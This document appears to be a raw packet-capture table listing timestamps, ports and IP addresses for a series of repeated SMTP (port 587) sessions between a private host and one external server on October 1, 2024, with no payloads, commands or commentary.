Oct 1, 2024 06:17:58.450514078 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.615875959 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.616015911 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:58.620798111 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.780188084 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.782093048 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:58.787029028 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.970158100 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.970170975 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.970180035 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.970187902 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.970232964 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:58.970263958 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:59.057387114 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.059169054 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:59.063965082 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.222047091 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.223124981 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:59.228136063 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.385718107 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.385962009 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:59.390738010 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.560492992 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.560842037 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:59.565637112 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.741698027 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.741916895 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:59.746788025 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.904095888 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:59.904284954 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:59.909092903 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.084031105 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.089667082 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.094523907 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.254838943 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.256392956 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.256459951 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.256459951 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.256611109 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.262130022 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.262137890 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.263091087 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.494992971 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.495765924 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.500766039 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.659704924 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.661928892 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.663551092 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:00.668332100 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:00.668421030 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:01.232371092 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.232580900 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:01.237413883 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.405668020 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.457410097 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:01.461915970 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:01.466820002 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.626455069 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.691879988 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:01.791953087 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:01.796817064 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.979741096 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.979754925 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.979768991 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.979780912 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:01.981549978 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:02.068166971 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.073683023 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:02.078753948 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.236496925 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.237225056 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:02.242024899 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.399152040 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.399429083 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:02.404606104 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.561880112 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.562220097 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:02.567075968 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.736963987 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.737545013 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:02.742355108 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.898936987 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:02.899341106 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:02.904309988 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.074580908 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.074750900 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.079525948 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.236999035 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.237251997 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.237337112 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.237355947 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.237386942 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.242024899 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.242196083 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.242283106 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.625256062 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.630120993 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.635117054 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.793406963 CEST	587	50445	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.793915987 CEST	50445	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.795981884 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:03.800906897 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:03.800990105 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:04.350436926 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.350605011 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:04.355446100 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.511722088 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.511998892 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:04.516840935 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.679335117 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.679824114 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:04.685658932 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.862474918 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.862485886 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.862502098 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.862512112 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.862517118 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.862586021 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:04.862586021 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:04.949337959 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:04.952786922 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:04.957714081 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.113270044 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.114227057 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:05.119050026 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.275243998 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.275439024 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:05.280350924 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.436971903 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.437212944 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:05.442141056 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.609700918 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.609853029 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:05.615854025 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.770905018 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.771114111 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:05.775974035 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.984944105 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:05.991575003 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:05.996829033 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.185951948 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.187841892 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:06.187841892 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:06.187876940 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:06.187876940 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:06.192754984 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.192763090 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.192862988 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.192868948 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.421283960 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.424290895 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:06.429163933 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.584322929 CEST	587	50446	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.585377932 CEST	50446	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:06.585408926 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:06.590253115 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:06.590406895 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.148041010 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.148164988 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.152975082 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.308753014 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.308900118 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.313776970 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.471628904 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.471923113 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.476756096 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.663629055 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.663645029 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.663654089 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.663664103 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.663675070 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.663710117 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.663739920 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.752481937 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.752542973 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.753838062 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.758629084 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.914113998 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:07.915009022 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:07.919893026 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.076575041 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.079890013 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.084775925 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.241102934 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.241419077 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.246320009 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.413963079 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.414149046 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.420862913 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.576248884 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.579235077 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.584053993 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.748830080 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.751674891 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.756516933 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.911880970 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.912133932 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.916954041 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.917968035 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.918005943 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.918005943 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:08.922956944 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:08.923019886 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:09.142574072 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:09.143354893 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:09.148159027 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:09.303941011 CEST	587	50447	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:09.304527998 CEST	50447	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:09.305838108 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:09.310669899 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:09.310724974 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:09.887931108 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:09.888159990 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:09.892936945 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.063348055 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.063707113 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:10.068571091 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.228682995 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.231877089 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:10.236759901 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.416779995 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.416786909 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.416798115 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.416805029 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.416809082 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.416877985 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:10.416877985 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:10.509203911 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.511827946 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:10.516580105 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.679217100 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.680574894 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:10.685431004 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.844403028 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:10.844583988 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:10.849410057 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.010236979 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.010427952 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.016972065 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.189235926 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.189404011 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.194358110 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.363991022 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.364183903 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.368968964 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.541837931 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.541974068 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.546853065 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.706300020 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.706600904 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.706659079 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.706684113 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.706758022 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.711458921 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.711469889 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.711575985 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.711641073 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.975003958 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:11.975750923 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:11.980627060 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:12.142622948 CEST	587	50448	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:12.145876884 CEST	50448	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:12.149569988 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:12.154427052 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:12.157744884 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:12.739885092 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:12.741672039 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:12.746454000 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:12.910145998 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:12.913681984 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:12.920093060 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.083112001 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.083560944 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:13.089608908 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.281588078 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.281609058 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.281620026 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.281630993 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.281656981 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:13.281675100 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:13.373990059 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.377023935 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:13.381824017 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.542968035 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.543922901 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:13.548784971 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.709775925 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.709949970 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:13.714766979 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.880508900 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:13.880811930 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:13.886322021 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.064717054 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.065788031 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.070707083 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.233360052 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.233536959 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.238298893 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.415432930 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.415644884 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.420473099 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.580707073 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.580996037 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.581044912 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.581044912 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.581115961 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.585843086 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.585849047 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.585949898 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.585957050 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.865699053 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:14.870024920 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:14.874835968 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.047261000 CEST	587	50449	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.047698975 CEST	50449	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:15.048569918 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:15.053431034 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.053491116 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:15.608010054 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.608138084 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:15.613732100 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.768373013 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.768615007 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:15.774143934 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.930072069 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:15.931201935 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:15.935975075 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.107608080 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.107626915 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.107635975 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.107645988 CEST	587	50450	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:16.107769966 CEST	50450	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:16.107769966 CEST	50450	587	192.168.2.4	198.54.114.247
